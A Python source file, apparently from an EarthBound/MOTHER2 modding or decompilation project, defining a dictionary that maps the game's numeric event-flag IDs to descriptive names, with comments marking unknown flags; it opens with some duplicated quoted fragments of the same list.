'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', #", "'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED',", "'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS',", "'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS',", "715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721:", "'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED',", "468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474:", "you about the Gourmet Yogurt Machine) # 377 (???) # 378 (???) 379:", "'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED',", "320 (???) 
# Dictionary of flag names for MOTHER2/Earthbound
# Luckily, every version uses the same flag IDs
FLAG_NAMES = {
    1: 'TEMP_1',
    2: 'TEMP_2',
    3: 'TEMP_3',
    4: 'TEMP_4',
    5: 'TEMP_5',
    6: 'TEMP_6',
    7: 'TEMP_7',
    8: 'TEMP_8',
    9: 'TEMP_9',
    10: 'TEMP_10',
    11: 'ENEMY_SUPPRESS',
    12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE',
    13: 'PAULA_JOINS',
    14: 'JEFF_JOINS',
    15: 'MONSTERS_IN_WINTERS',
    16: 'POO_JOINS',
    17: 'POO_LEARNING_STARSTORM',
    18: 'BUZZ_BUZZ_IN_PARTY',
    19: 'SLEEPING_KING_ABSENT',
    20: 'PICKY_IN_PARTY',
    21: 'POKEY_IN_PARTY',
    22: 'BUBBLE_MONKEY_IN_PARTY',
    23: 'TONY_JOINS',
    24: 'DUNGEON_MAN_JOINS',
    25: 'FLYING_MAN_1_JOINS',
    26: 'FLYING_MAN_2_JOINS',
    27: 'FLYING_MAN_3_JOINS',
    28: 'FLYING_MAN_4_JOINS',
    29: 'FLYING_MAN_5_JOINS',
    30: 'POKEY_JOINS',
    31: 'LIER_INSIDE_HOUSE',
    32: 'LIER_INSIDE_CAVE_1',
    33: 'LIER_INSIDE_CAVE_2',
    34: 'PICKY_AT_HIS_ROOM',
    35: 'POKEY_AT_HIS_ROOM',
    36: 'COP_AT_ENTERTAINERS_SHACK',
    37: 'ALOYSIUS_AT_HOME',
    38: 'FIVE_COPS_AT_POLICE_STATION',
    39: 'COP_AT_STATION_ENTRANCE',
    40: 'SHARK_GUARDING_FRANK_DEFEATED',
    41: 'CHAOS_THEATER_STAGE_UNBLOCKED',
    42: 'APPLE_KID_IN_BURGLIN_PARK',
    43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE',
    44: 'POKEY_OUTSIDE_HH_HQ',
    45: 'POKEY_OUTSIDE_PAULA_CABIN',
    46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL',
    47: 'BROKEN_SKYRUNNER_THREED',
    48: 'FIXED_SKYRUNNER_THREED',
    49: 'BOOGEY_TENT_IN_THREED',
    50: 'BRICK_ROAD_OUTSIDE_DUNGEON',
    51: 'SHYNESS_BOOK_AT_LIBRARY',
    52: 'CAPTIVES_AT_STONEHENGE',
    53: 'TALKED_TO_BRICK_ROAD',
    # 54 (Montague at beginning of expanded mine?)
    # 55 (Also related to Montague... AND STONEHENGE??)
    # 56 (Unknown)
    57: 'FOURSIDE_DEPT_BLACKOUT',
    58: 'FOURSIDE_SEWERS_OPEN',
    59: 'ELECTRA_OUTSIDE_BUILDING',
    60: 'EVERDRED_OUTSIDE_CAFE',
    61: 'MAGIC_CAKE_LADY_IDENTIFIED',
    62: 'DUNGEON_MAN_IN_DESERT',
    63: 'PATH_TO_MANI_MANI_OPEN',
    64: 'FRANKYSTEIN_MKII_DEFEATED',
    # 65 (???)
    66: 'EVERDRED_DEFEATED',
    67: 'FOOD_STAND_MONITOR_DEFEATED',
    68: 'CARPAINTER_DEFEATED',
    69: 'BOOGEY_TENT_DEFEATED',
    70: 'STARMAN_DX_DEFEATED',
    71: 'MASTER_BELCH_DEFEATED',
    72: 'MINE_MOLES_DEFEATED',
    73: 'GIYGAS_DEFEATED',
    74: 'NESS_NIGHTMARE_DEFEATED',
    75: 'MANI_MANI_DEFEATED',
    76: 'GOT_TRACY_COOKIE',
    77: 'GOT_MR_BASEBALL_CAP',
    78: 'GOT_ENTERTAINERS_TRAVEL_CHARM',
    79: 'GOT_METEORITE_PIECE',
    80: 'GOT_KEY_TO_SHACK',
    81: 'HAS_BICYCLE',
    82: 'GOT_RECEIVER_PHONE',
    83: 'GOT_PENCIL_ERASER',
    84: 'GOT_HAND_AID',
    85: 'GOT_WAD_OF_BILLS',
    86: 'GOT_FRANKLIN_BADGE',
    87: 'GOT_FLY_HONEY',
    88: 'GOT_BAD_KEY_MACHINE',
    89: 'GOT_SHYNESS_BOOK',
    90: 'GOT_DIAMOND',
    91: 'GOT_SIGNED_BANANA',
    92: 'GOT_TENDA_DRAGONITE',
    93: 'GOT_MAGICANT_BASEBALL_CAP',
    94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT',
    95: 'DAD_CALLING_HOME',
    96: 'POKEY_WAITING_MOM_GOODBYE',
    97: 'NESS_HOUSE_POKEY_MUSIC',
    98: 'ANSWERED_DADS_CALL',
    99: 'BOUGHT_SCAM_HOUSE',
    100: 'KING_WONT_JOIN',
    101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI',
    102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK',
    103: 'LIBRARY_BATHROOM_MAN',  # Referenced in unused text
    104: 'POKEY_PUNISHED',
    105: 'PATH_TO_TWOSON_OPEN',
    # 106 (???)
    107: 'ONETT_SUNRISE',
    108: 'ENTERTAINERS_SHACK_UNLOCKED',
    109: 'ONETT_COP_DIALOGUE',
    # 110 (???)
    111: 'VISITED_PEACEFUL_REST_PENCIL',
    112: 'INVESTED_IN_APPLE_KID',
    113: 'STUBBY_LEGS',
    114: 'TWOSON_DEPT_MAN',
    115: 'CHAOS_THEATER_BACKSTAGE_OPEN',
    116: 'ORANGE_KID_ALT_TEXT',
    117: 'INVESTED_IN_ORANGE_KID',
    118: 'PAULAS_DAD_OUTSIDE',
    119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER',
    120: 'SHOPPED_AT_FOOD_STAND',
    121: 'DID_NOT_PAY_FOOD_STAND',
    122: 'CARPAINTER_HAS_KEY',
    123: 'BLUE_COW_ALT_TEXT',
    124: 'ZOMBIE_PAPER_ON_TENT',
    125: 'ZOMBIES_ON_TENT_FLOOR',
    126: 'LEARNED_ABOUT_SHYNESS_BOOK',  # TODO: Maybe "can search for shyness book"? This flag is set even if you don't talk to Apple Kid
    127: 'TALKED_TO_ANDONUTS_1',
    128: 'JEFF_STARTS_HIS_JOURNEY',
    129: 'TESSIE_EMERGES',
    130: 'TALKED_TO_ANDONUTS_2',
    131: 'WATERFALL_WAIT_ENABLED',
    132: 'QUEST_TO_ZEXONYTE',
    133: 'PHASE_DISTORTER_V2_OPEN',
    134: 'DELIVERED_ZEXONYTE',
    135: 'TALKED_TO_BLACK_SESAME_SEED',
    136: 'TRAFFIC_JAM_CLEARED',
    137: 'GAVE_FOOD_TO_MONTAGUE',
    138: 'TALKED_TO_WHITE_SESAME_SEED',
    139: 'DEPT_STORE_SPOOK_DEFEATED',  # TODO: Confirm
    140: 'QUEST_TO_VENUS_AUTOGRAPH',
    141: 'GOT_TROUT_YOGURT',
    142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR',
    143: 'FOURSIDE_FREE_FROM_MONOTOLI',
    # 144 (Related to Bulldozer at ...)
    145: 'TALKED_TO_DYING_EVERDRED',
    146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER',
    # 147 (Venus at Topolla?)
    148: 'READ_HIEROGLYPHS',
    149: 'POO_STARTS_HIS_JOURNEY',
    # 150 (Related to Poo's journey)
    151: 'QUEST_TO_SUBMARINE',
    152: 'PYRAMID_DANCE_IN_PROGRESS',
    153: 'TENDA_VILLAGE_UNDERGROUND_OPEN',
    154: 'TALKED_TO_TENDA_CHIEF',
    155: 'TENDAS_NOT_SHY',
    # 156 (???)
    # 157 (???)
    # 158 (???)
    159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE',
    # 160 (???)
    # 161 (???)
    # 162 (???)
    # 163 (???)
    # 164 (???)
    165: 'INVISIBLE_MAN_JOINS',
    166: 'MOONSIDE_COUNTDOWN_GUY_1',
    167: 'MOONSIDE_COUNTDOWN_GUY_2',
    168: 'MOONSIDE_COUNTDOWN_GUY_3',
    169: 'PHASE_DISTORTER_V2_BEING_FINISHED',
    # 170 (???)
    171: 'GOT_SATURN_LIFENOODLES',
    172: 'GOT_SATURN_COIN',
    173: 'GOT_SATURN_STAG_BEETLE',
    174: 'DESERT_MINE_EXPANDED',
    # 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)
    176: 'HEALER_SOFTEN',
    177: 'HEALER_PURIFY',
    178: 'HEALER_RESTORE_FEELING',
    179: 'LARGE_PIZZA_DELIVERY',
    180: 'PIZZA_DELIVERY',
    181: 'ESCARGO_EXPRESS_DELIVERY',
    182: 'GOT_MELODY_GIANT_STEP',
    183: 'GOT_MELODY_LILLIPUT_STEPS',
    184: 'GOT_MELODY_RAINY_CIRCLE',
    185: 'GOT_MELODY_MILKY_WELL',
    186: 'GOT_MELODY_MAGNET_HILL',
    187: 'GOT_MELODY_PINK_CLOUD',
    188: 'GOT_MELODY_LUMINE_HALL',
    189: 'GOT_MELODY_FIRE_SPRING',
    190: 'CONQUERED_SANCTUARY_1',
    191: 'CONQUERED_SANCTUARY_2',
    192: 'CONQUERED_SANCTUARY_4',
    193: 'CONQUERED_SANCTUARY_3',
    194: 'CONQUERED_SANCTUARY_5',
    195: 'CONQUERED_SANCTUARY_6',
    196: 'CONQUERED_SANCTUARY_7',
    197: 'CONQUERED_SANCTUARY_8',
    # 198 (Unknown. Set when Paula joins)
    199: 'GOT_DAD_PHONE',
    200: 'GOT_MOM_PHONE',
    201: 'GOT_ESCARGO_EXPRESS_PHONE',
    202: 'GOT_MACH_PIZZA_PHONE',
    203: 'GOT_STOIC_CLUB_PHONE',
    204: 'FLYING_MAN_1_DEAD',
    205: 'FLYING_MAN_2_DEAD',
    206: 'FLYING_MAN_3_DEAD',
    207: 'FLYING_MAN_4_DEAD',
    208: 'FLYING_MAN_5_DEAD',
    209: 'VISITED_ONETT',
    210: 'VISITED_TWOSON',
    211: 'VISITED_THREED',
    212: 'VISITED_WINTERS',
    213: 'VISITED_SATURN_VALLEY',
    214: 'VISITED_FOURSIDE',
    215: 'VISITED_SUMMERS',
    216: 'VISITED_DALAAM',
    217: 'VISITED_SCARABA',
    218: 'VISITED_DEEP_DARKNESS',
    219: 'VISITED_TENDA_VILLAGE',
    220: 'VISITED_UNDERWORLD',
    221: 'UNUSED_BRAIN_FOOD_LUNCH',
    222: 'UNUSED_REFRESHING_HERB',
    223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE',
    224: 'SHOP_SOLD_OLD_EQUIPMENT',
    225: 'SHOP_SOLD_ITEM',
    # 226 (I hate multipurpose flags)
    # 227 (I hate multipurpose flags)
    # 228 (I hate multipurpose flags)
    # 229 (I hate multipurpose flags)
    # 230 (I hate multipurpose flags)
    # 231 (I hate multipurpose flags)
    # 232 (I hate multipurpose flags)
    234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN',
    235: 'SHOP_BURGLIN_PARK_JAMAICAN',
    236: 'SHOP_BURGLIN_PARK_BAKERY',
    237: 'SHOP_BURGLIN_PARK_CONDIMENTS',
    238: 'SHOP_BURGLIN_PARK_BANANA_LADY',
    239: 'SHOP_HH_DRUGSTORE_CONSUMABLES',
    240: 'SHOP_HH_DRUGSTORE_EQUIPMENT',
    241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT',
    242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES',
    243: 'SHOP_THREED_ARMS_DEALER',
    244: 'SHOP_THREED_BAKERY',
    245: 'SHOP_WINTERS_DRUGSTORE',
    246: 'SHOP_LAB_CAVE_BOY',
    247: 'SHOP_GRAPEFRUIT_FALLS',
    248: 'SHOP_SATURN_EQUIPMENT',
    249: 'SHOP_SATURN_PENDANTS',
    253: 'SHOP_DESERT_MINE',
    254: 'SHOP_DESERT_ARMS_DEALER',
    255: 'SHOP_FOURSIDE_BAKERY',
    256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT',
    257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES',
    258: 'SHOP_FOURSIDE_DEPT_BAKERY',
    259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS',
    260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS',
    261: 'SHOP_FOURSIDE_DEPT_BURGER',
    262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS',
    263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER',
    264: 'SHOP_FOURSIDE_PUNK_GUY',
    265: 'SHOP_SUMMERS_SHOP',
    266: 'SHOP_SUMMERS_RESTAURANT',
    267: 'SHOP_TOTO_SHOP',
    268: 'SHOP_SUMMERS_GELATO',
    269: 'SHOP_MAGIC_CAKE_LADY',
    270: 'SHOP_DALAAM_RESTAURANT',
    271: 'SHOP_SCARABA_HASSANS_SHOP',
    272: 'DIAMOND_TO_BE_DELIVERED',
    273: 'MU_TRAINING_COMPLETE',
    274: 'DUNGEON_MAN_AT_PALM_TREES',
    275: 'LEARNED_TELEPORT',
    276: 'MASTER_BARF_DEFEATED',
    277: 'GUARDIAN_MOLE_1_DEFEATED',
    278: 'GUARDIAN_MOLE_2_DEFEATED',
    279: 'GUARDIAN_MOLE_3_DEFEATED',
    280: 'GUARDIAN_MOLE_4_DEFEATED',
    281: 'GUARDIAN_MOLE_5_DEFEATED',
    # 282 (Five moles defeated? How does this differ from 72?)
    # 283 (???)
    284: 'PEACEFUL_REST_PENCIL_ERASED',
    285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT',
    # 286 (???)
    # 287 (Something about Lake Tess color palette)
    288: 'USED_HAWK_EYE',
    289: 'ONETT_COP_1_DEFEATED',
    290: 'ONETT_COP_2_DEFEATED',
    291: 'ONETT_COP_3_DEFEATED',
    292: 'ONETT_COP_4_DEFEATED',
    293: 'ONETT_COP_5_DEFEATED',
    294: 'APPLE_MOUSE_BLOCKING_DOOR',
    295: 'NESS_HOUSE_DOOR_KNOCKING',
    296: 'ZOMBIE_CHICK_AT_HOTEL_1',  # First hotel room
    297: 'ZOMBIE_CHICK_AT_HOTEL_2',  # Second hotel room
    298: 'ZOMBIE_CHICK_AT_HOTEL_3',  # Third hotel room
    299: 'IRON_ERASER_ERASED',
    300: 'ZOMBIE_GUARDS_AWAY',
    301: 'POKEY_WAITING_AT_DOOR',
    # 302 (???)
    303: 'BUZZ_BUZZ_DYING_ON_FLOOR',
    304: 'KING_AWAKE_AT_HOME',
    # 305 (???)
    306: 'LIER_INSIDE_CAVE_3',
    309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED',
    310: 'POKEY_WAITING_AT_COUCH',
    311: 'WINTERS_ROPE_LOWERED',
    312: 'GHOSTS_BLOCKING_THREED',
    # 313 (Unknown. Something about the City Bus?)
    # 314 (Unknown. Something about the Runaway Five Bus?)
    315: 'GHOSTS_BLOCKING_TWOSON',
    # 316 (Unknown. Something about the City Bus?)
    317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED',
    318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM',
    319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER',
    # 320 (???)
    # 321 (Something about Paula's Dad acknowledging the kidnapping)
    322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME',
    323: 'GOT_PAK_OF_BUBBLE_GUM',
    324: 'SHOP_RED_SNAKE',
    325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT',
    326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER',
    327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT',
    328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1',
    329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT',
    341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER',
    342: 'PYRAMID_OPEN',
    343: 'GOT_HIEROGLYPH_COPY',
    344: 'LAKE_TESS_WIND_BLOWING',
    # 345 (Related to Lake Tess. This is only set if you're near (0x02A0, 0x0D70) in a radius of 16 pixels)
    346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY',
    347: 'PYRAMID_HOLE_OPEN',
    348: 'GOT_HAWK_EYE',
    349: 'JUST_WOKE_UP_FROM_MAGICANT',
    350: 'USED_ELEVATOR',
    351: 'HH_HQ_CULTIST_1_DEFEATED',
    352: 'HH_HQ_CULTIST_2_DEFEATED',
    353: 'HH_HQ_CULTIST_3_DEFEATED',
    354: 'HH_HQ_CULTIST_4_DEFEATED',
    355: 'HH_HQ_CULTIST_5_DEFEATED',
    356: 'HH_HQ_CULTIST_6_DEFEATED',
    357: 'SENTRY_ROBOT_1_DEFEATED',
    358: 'SENTRY_ROBOT_2_DEFEATED',
    359: 'SENTRY_ROBOT_3_DEFEATED',
    360: 'SENTRY_ROBOT_4_DEFEATED',
    361: 'SENTRY_ROBOT_5_DEFEATED',
    362: 'SENTRY_ROBOT_6_DEFEATED',
    363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED',
    364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED',
    365: 'SHARK_AT_ARCADE_ABSENT',
    366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT',
    367: 'SLIMY_LITTLE_PILE_2_DEFEATED',
    368: 'SLIMY_LITTLE_PILE_3_DEFEATED',
    # 371 (???)
    372: 'PARTY_IS_ROBOTIFIED',
    # 373 (Unknown. Related to Boogey Tent)
    374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED',
    375: 'PEOPLE_IN_ONETT',
    # 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine)
    # 377 (???)
    # 378 (???)
    379: 'ANDONUTS_AT_LAB_ABSENT',
    # 380 (???)
    # 381 (???)
    382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT',
    383: 'JUST_RESTED',
    384: 'GOT_ALL_MELODIES',
    385: 'GOT_CONTACT_LENS',
    386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED',  # Unused, there's no NPC attached to the script for this battle
    387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED',
    388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED',
    389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED',
    390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED',  # The first Hieroglyph Guardian doesn't reference this flag and never fights you
    391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED',  # The second Hieroglyph Guardian doesn't reference this flag and never fights you
    392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED',
    393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED',
    394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED',
    395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED',
    396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED',
    397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED',
    398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED',
    399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED',
    400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED',
    401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED',
    402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED',
    403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED',
    404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED',
    405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED',
    406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED',
    407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED',
    408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED',
    409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED',
    410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED',
    411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED',
    412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED',
    413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED',
    414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED',
    415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED',
    416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED',
    417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED',
    418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED',
    419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED',
    420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED',
    421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED',
    422: 'ONETT_DAYTIME',
    423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING',
    424: 'TENDA_SHOP_PLAIN_ROLL_1',
    425: 'TENDA_SHOP_PLAIN_YOGURT',
    426: 'TENDA_SHOP_PLAIN_ROLL_2',
    427: 'TENDA_SHOP_SPICY_JERKY',
    428: 'TENDA_SHOP_BAG_OF_DRAGONITE',
    429: 'TENDA_SHOP_TALISMAN_COIN',
    430: 'TENDA_SHOP_HALL_OF_FAME_BAT',
    # 431 (???)
    432: 'DEBUG_SKIP_SANDWICH_DX',
    433: 'ZOMBIE_CHICK_HOTEL_MUSIC',
    434: 'STARMAN_DX_ABSENT',  # (Another flag for Starman DX defeated. One of them might be responsible only for palette changes, maybe)
    435: 'GUARDIAN_GENERAL_DEFEATED',
    436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED',
    437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED',
    438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED',
    439: 'GOT_MAGIC_TRUFFLE_1',
    440: 'GOT_MAGIC_TRUFFLE_2',
    441: 'GOT_MAGIC_TRUFFLE_3',
    442: 'GOT_MAGIC_TRUFFLE_4',
    443: 'GOT_MAGIC_TRUFFLE_5',
    444: 'KING_JOINS',
    445: 'TALKED_TO_BRICK_ROADS_HEAD',
    446: 'FOR_SALE_SIGN_CUSTOMER_1',
    # 447 (???)
    # 448 (???)
    449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE',
    450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK',
    451: 'MONKEY_CAVE_SKIP_SANDWICH',
    452: 'MONKEY_CAVE_PICNIC_LUNCH',
    453: 'MONKEY_CAVE_WET_TOWEL',
    454: 'MONKEY_CAVE_PIZZA_1',
    455: 'MONKEY_CAVE_PROTEIN_DRINK',
    456: 'MONKEY_CAVE_PIZZA_2',
    457: 'MONKEY_CAVE_HAMBURGER_1',
    458: 'MONKEY_CAVE_HAMBURGER_2',
    459: 'MONKEY_CAVE_KING_BANANA',
    460: 'MONKEY_CAVE_HAMBURGER_3',
    461: 'MONKEY_CAVE_FRESH_EGG',
    462: 'MONKEY_CAVE_RULER',
    463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY',
    464: 'GOT_KING_BANANA',
    # 465 (???)
    466: 'PICKY_SLEEPING_AT_METEORITE',
    # 467 (Unknown. Related to Ness's house door knocking?)
    468: 'POKEYS_HOUSE_LOCKED',
    469: 'POLICE_AT_METEORITE',
    470: 'TALKED_TO_TRACY_AT_HER_ROOM',
    471: 'TALKED_TO_MOM',
    472: 'TALKED_TO_POKEY_AT_METEORITE',
    473: 'TRACY_AT_HALLWAY',
    474: 'NESS_MOM_OUTSIDE',
    # 475 (Handles continue yes/no on death. TODO: Investigate)
    476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP',
    477: 'NESS_SLEEPING_AT_HIS_BED',
    478: 'SHOP_SCARABA_CONDIMENTS',
    479: 'PHOTO_NESS_HOUSE_AVAILABLE',
    480: 'PHOTO_SCAM_HOUSE_AVAILABLE',
    481: 'PHOTO_CYCLE_SHOP_AVAILABLE',
    482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE',
    483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE',
    484: 'PHOTO_CHAOS_THEATER_AVAILABLE',
    485: 'PHOTO_LAKE_TESS_AVAILABLE',
    486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE',
    487: 'PHOTO_THREED_CEMETERY_AVAILABLE',
    488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE',
    489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE',
    490: 'PHOTO_CIRCUS_TENT_AVAILABLE',
    491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE',
    492: 'PHOTO_DESERT_MINE_AVAILABLE',
    493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE',
    494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE',
    495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE',
    496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE',
    497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE',
    498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE',
    499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE',
    500: 'PHOTO_STONEHENGE_AVAILABLE',
    501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE',
    502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE',
    503: 'PHOTO_SUMMERS_BEACH_AVAILABLE',
    504: 'PHOTO_TOTO_AVAILABLE',
    505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE',
    506: 'PHOTO_PYRAMID_AVAILABLE',
    507: 'PHOTO_SCARABA_OASIS_AVAILABLE',
    508: 'PHOTO_DEEP_DARKNESS_AVAILABLE',
    509: 'PHOTO_TENDA_VILLAGE_AVAILABLE',
    510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE',
    511: 'GOT_TOWN_MAP',
    512: 'HAS_EXIT_MOUSE',
    513: 'ONETT_POST_METEORITE_MUSIC',
    514: 'JUST_RESTED_AT_HOME',
    515: 'FRANK_DEFEATED',
    516: 'MONKEY_CAVE_PENCIL_ERASED',
    517: 'NESS_ROOM_LIGHTS_ON',
    518: 'GUARDIAN_MOLE_TEXT_1',
    519: 'GUARDIAN_MOLE_TEXT_2',
    520: 'GUARDIAN_MOLE_TEXT_3',
    521: 'GUARDIAN_MOLE_TEXT_4',
    # 522 (Multipurpose?)
    # 523 (Multipurpose?)
    524: 'YOUR_SANCTUARY_MUSIC',
    # 525 (???)
    530: 'TRACY_NOT_AT_HER_ROOM',
    531: 'TRACY_DOWNSTAIRS',
    532: 'NESS_ROOM_METEORITE_FALLING_MUSIC',
    533: 'NESS_ROOM_METEORITE_CRASH_MUSIC',
    534: 'CITY_BUS_MUSIC',
    535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC',
    536: 'RUNAWAY_FIVE_FREE_MUSIC',
    537: 'TESSIE_MUSIC',
    # 538 (???)
    539: 'GIVEN_PLAYERS_NAME',
    # 540 (???)
    541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR',
    542: 'SAILING_OR_SUBMARINE_MUSIC',
